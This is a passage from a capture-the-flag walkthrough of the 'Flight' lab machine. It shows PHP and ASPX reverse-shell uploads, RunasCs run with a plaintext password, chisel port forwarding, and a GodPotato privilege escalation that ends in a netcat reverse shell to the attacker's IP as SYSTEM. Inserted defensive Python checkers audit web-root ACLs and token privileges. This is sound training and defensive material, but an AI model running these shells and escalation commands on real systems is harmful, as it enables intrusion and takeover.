We can also upload a PHP file, and the web server executes it:
smb: \flight.htb\> put test.php
putting file test.php as \flight.htb\test.php (0.0 kb/s) (average 0.0 kb/s)
smb: \flight.htb\>
So we can upload a PHP reverse shell and catch a shell:
smb: \flight.htb\> put revshell.php
putting file revshell.php as \flight.htb\revshell.php (7.2 kb/s) (average 3.3 kb/s)
smb: \flight.htb\>
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.187] 50247
SOCKET: Shell has connected! PID: 4812
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\xampp\\htdocs\\flight.htb>whoami
flight\\svc_apache
C:\\xampp\\htdocs\\flight.htb>
Shell as C.Bum
Let’s upload RunasCs and get a shell as C.Bum:
C:\\temp>curl http://10.10.16.3/RunasCs.exe -o RunasCs.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 51712  100 51712    0     0  18604      0  0:00:02  0:00:02 --:--:-- 18628
C:\\temp>.\\RunasCs.exe C.Bum Tikkycoll_431012284 powershell.exe -r 10.10.16.3:9001
[*] Warning: The logon for user 'C.Bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\\Desktop: Service-0x0-58fdd$\\Default
[+] Async process 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' with pid 4080 created in background.
C:\\temp>
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.187] 50278
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\\Windows\\system32> whoami
whoami
flight\\c.bum
PS C:\\Windows\\system32>
And we get user.txt:
PS C:\\Users\\C.Bum\\Desktop> dir
dir
    Directory: C:\\Users\\C.Bum\\Desktop
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---        8/19/2025   2:21 PM             34 user.txt                                                              
PS C:\\Users\\C.Bum\\Desktop>
Privilege Escalation
Shell as defaultapppool
Internal port 8000
We found that something is listening on the internal port 8000.

Let’s use chisel to forward it to our machine:
└─$ ./chisel server -p 8000 --reverse  
2025/08/20 21:38:11 server: Reverse tunnelling enabled
2025/08/20 21:38:11 server: Fingerprint djTX3b380m4VT345PaUEAlXkBzvLZyPj6h54LaSMhro=
2025/08/20 21:38:11 server: Listening on http://0.0.0.0:8000
2025/08/20 21:39:09 server: session#1: Client version (1.10.1) differs from server version (0.0.0-src)
2025/08/20 21:39:09 server: session#1: tun: proxy#R:8001=>8000: Listening
PS C:\\temp> .\\chisel.exe client 10.10.16.6:8000 R:8001:127.0.0.1:8000
.\\chisel.exe client 10.10.16.6:8000 R:8001:127.0.0.1:8000
2025/08/20 16:09:10 client: Connecting to ws://10.10.16.6:8000
2025/08/20 16:09:15 client: Connected (Latency 370.9469ms)
Nice, I can now access port 8000 via localhost:8001:
└─$ nmap -sC -sV -p 8001 127.0.0.1
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 21:40 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000085s latency).
PORT     STATE SERVICE VERSION
8001/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Flight - Travel and Tour
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds
Port 8000

The website on port 8000 was not functioning.
Uploading a revshell (auth as defaultapppool)
User C.Bum has Write access to C:\\inetpub\\development (not full control):
PS C:\\inetpub> icacls development
icacls development
development flight\\C.Bum:(OI)(CI)(W)
            NT SERVICE\\TrustedInstaller:(I)(F)
            NT SERVICE\\TrustedInstaller:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\\SYSTEM:(I)(F)
            NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\\Administrators:(I)(F)
            BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)
            BUILTIN\\Users:(I)(RX)
            BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
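A defender-side check for the two findings above (the Web share writable over SMB and C.Bum's (W) entry on C:\\inetpub\\development): an added example, not from the page, that parses icacls output and reports any principal outside the expected administrative set that can modify content under a web root. The sample input is a trimmed copy of the icacls output above; the trusted-principal set and the rights treated as write-capable are assumptions of this example.

```python
import re

# Principals expected to hold write access on a web root; anything else with
# write-capable rights is a finding. Both sets are assumptions of this example.
TRUSTED = {"NT SERVICE\\TrustedInstaller", "NT AUTHORITY\\SYSTEM",
           "BUILTIN\\Administrators", "CREATOR OWNER"}
INHERIT_FLAGS = {"OI", "CI", "IO", "I", "NP"}          # icacls inheritance, not rights
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "GW", "GA", "D", "DC"}

ACE_RE = re.compile(r"^(?P<who>.+?):(?P<ace>(?:\([^)]*\))+)$")

def parse_icacls(output):
    """Return (path, {principal: set of rights}) from icacls <path> output.
    Assumes the path has no spaces (icacls prints it before the first ACE)."""
    path, acl = None, {}
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if path is None:                      # first line: "<path> <ACE>"
            path, _, line = line.partition(" ")
        m = ACE_RE.match(line)
        if not m:
            continue
        tokens = re.findall(r"\(([^)]*)\)", m.group("ace"))
        rights = {r.strip() for t in tokens for r in t.split(",")} - INHERIT_FLAGS
        acl.setdefault(m.group("who"), set()).update(rights)
    return path, acl

def untrusted_writers(output):
    """Principals outside TRUSTED that can modify content under the path."""
    path, acl = parse_icacls(output)
    return path, {who: sorted(rights & WRITE_RIGHTS)
                  for who, rights in acl.items()
                  if who not in TRUSTED and rights & WRITE_RIGHTS}

# Constructed sample: a trimmed copy of the icacls output shown above.
SAMPLE = r"""development flight\C.Bum:(OI)(CI)(W)
            NT SERVICE\TrustedInstaller:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Administrators:(I)(F)
            BUILTIN\Users:(I)(RX)
            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files"""
```

Run over `icacls` output for each web root (the XAMPP htdocs behind the SMB Web share as well as the IIS folder), the only non-admin writer reported here is flight\\C.Bum with W, which is exactly the path the walkthrough abuses.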
PS C:\\inetpub>
Let’s try to upload a test PHP file.

Looks like we need to upload an ASP.NET (.aspx) file instead:
┌──(anurag㉿anurag)-[~/htb/Flight]
└─$ cat test.aspx
<% Response.Write("Hello World") %>
Let’s upload a revshell
I will use this revshell
PS C:\\inetpub\\development> curl http://10.10.16.6/revshell.aspx -o revshell.aspx
curl http://10.10.16.6/revshell.aspx -o revshell.aspx
PS C:\\inetpub\\development> dir
dir
    Directory: C:\\inetpub\\development
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        8/20/2025   4:42 PM                css                                                                   
d-----        8/20/2025   4:42 PM                fonts                                                                 
d-----        8/20/2025   4:42 PM                img                                                                   
d-----        8/20/2025   4:42 PM                js                                                                    
-a----        4/16/2018   2:23 PM           9371 contact.html                                                          
-a----        4/16/2018   2:23 PM          45949 index.html                                                            
-a----        8/20/2025   4:42 PM          15546 revshell.aspx                                                         
PS C:\\inetpub\\development>
Then load http://127.0.0.1:8001/revshell.aspx through the tunnel to trigger it:
└─$ nc -nlvp 2222
listening on [any] 2222 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.187] 54149
Spawn Shell...
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\\windows\\system32\\inetsrv>whoami
whoami
iis apppool\\defaultapppool
c:\\windows\\system32\\inetsrv>
SeImpersonatePrivilege
C:\\Users>whoami /all
whoami /all
USER INFORMATION
----------------
User Name                  SID                                                          
========================== =============================================================
iis apppool\\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Mandatory Label\\High Mandatory Level       Label            S-1-16-12288                                                   
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\\IIS_IUSRS                          Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                           Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
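Added example, not from the page: a check over the PRIVILEGES INFORMATION block of `whoami /all` that flags token privileges which let a process escalate, reporting them whether Enabled or Disabled, since a disabled privilege is still held by the token and can be re-enabled by the process itself. The sample is constructed from the defaultapppool dump above; the list of privileges treated as dangerous is an assumption of this example.

```python
import re

# Token privileges that let a holder escalate (list assumed by this example).
DANGEROUS_PRIVS = {
    "SeImpersonatePrivilege": "impersonate a client (Potato-style token theft)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open and tamper with any process, including SYSTEM",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
}

# "<name> <description> <Enabled|Disabled>" rows of the privileges table.
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")

def parse_privileges(whoami_all):
    """Return {privilege: state} from the PRIVILEGES INFORMATION section."""
    privs, in_section = {}, False
    for line in whoami_all.splitlines():
        if line.startswith("PRIVILEGES INFORMATION"):
            in_section = True
        elif line.startswith("USER CLAIMS INFORMATION"):
            break
        elif in_section and (m := PRIV_RE.match(line.rstrip())):
            privs[m.group(1)] = m.group(2)
    return privs

def risky_privileges(whoami_all):
    """Map each dangerous privilege held by the token to (state, why it matters).

    A Disabled privilege is still part of the token: the process can enable it
    with AdjustTokenPrivileges, so presence, not state, decides the risk."""
    privs = parse_privileges(whoami_all)
    return {name: (state, DANGEROUS_PRIVS[name])
            for name, state in privs.items() if name in DANGEROUS_PRIVS}

# Constructed sample, copied from the defaultapppool token dump above.
SAMPLE = """PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
USER CLAIMS INFORMATION
"""
```

On this dump the check reports SeImpersonatePrivilege (Enabled) and SeAssignPrimaryTokenPrivilege (Disabled); the first is what the next step relies on, and the second would matter just as much even though it shows as Disabled.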
C:\\Users>
Since we have SeImpersonatePrivilege we can perform a Potato attack.
I will use GodPotato:
C:\\temp>.\\GodPotato-NET4.exe -cmd "cmd /c whoami"
.\\GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140712155545600
[*] DispatchTable: 0x140712157851712
[*] UseProtseqFunction: 0x140712157228240
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\\\.\\pipe\\f383a545-0b6d-4574-948e-ba1c5e1c90e3\\pipe\\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00009402-05d0-ffff-fec1-967cb7707aef
[*] DCOM obj OXID: 0x219584eb64a20631
[*] DCOM obj OID: 0xa2681efa43cbb056
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 924 Token:0x816  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\\SYSTEM
[*] process start with pid 1900
nt authority\\system
C:\\temp>
From here we can get a shell or simply view root.txt:
C:\\temp>.\\GodPotato-NET4.exe -cmd "cmd /c nc.exe 10.10.16.6 2233 -e cmd.exe"
.\\GodPotato-NET4.exe -cmd "cmd /c nc.exe 10.10.16.6 2233 -e cmd.exe"
[*] CombaseModule: 0x140712155545600
[*] DispatchTable: 0x140712157851712
[*] UseProtseqFunction: 0x140712157228240
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\\\.\\pipe\\9098d5e6-1183-4515-8c9f-d4ef1ec78d0d\\pipe\\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00005c02-0d7c-ffff-8630-45d3e81365ea
[*] DCOM obj OXID: 0x1fe1e7b8e6cba310
[*] DCOM obj OID: 0x3f4265f8f9cd1ae9
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 924 Token:0x816  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\\SYSTEM
[*] process start with pid 3236
└─$ nc -nlvp 2233
listening on [any] 2233 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.187] 54207
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\temp>whoami
whoami
nt authority\\system
C:\\temp>dir C:\\Users\\Administrator\\Desktop
dir C:\\Users\\Administrator\\Desktop
 Volume in drive C has no label.
 Volume Serial Number is 1DF4-493D
 Directory of C:\\Users\\Administrator\\Desktop
09/22/2022  01:48 PM    <DIR>          .
09/22/2022  01:48 PM    <DIR>          ..
08/19/2025  02:21 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   4,917,837,824 bytes free
C:\\temp>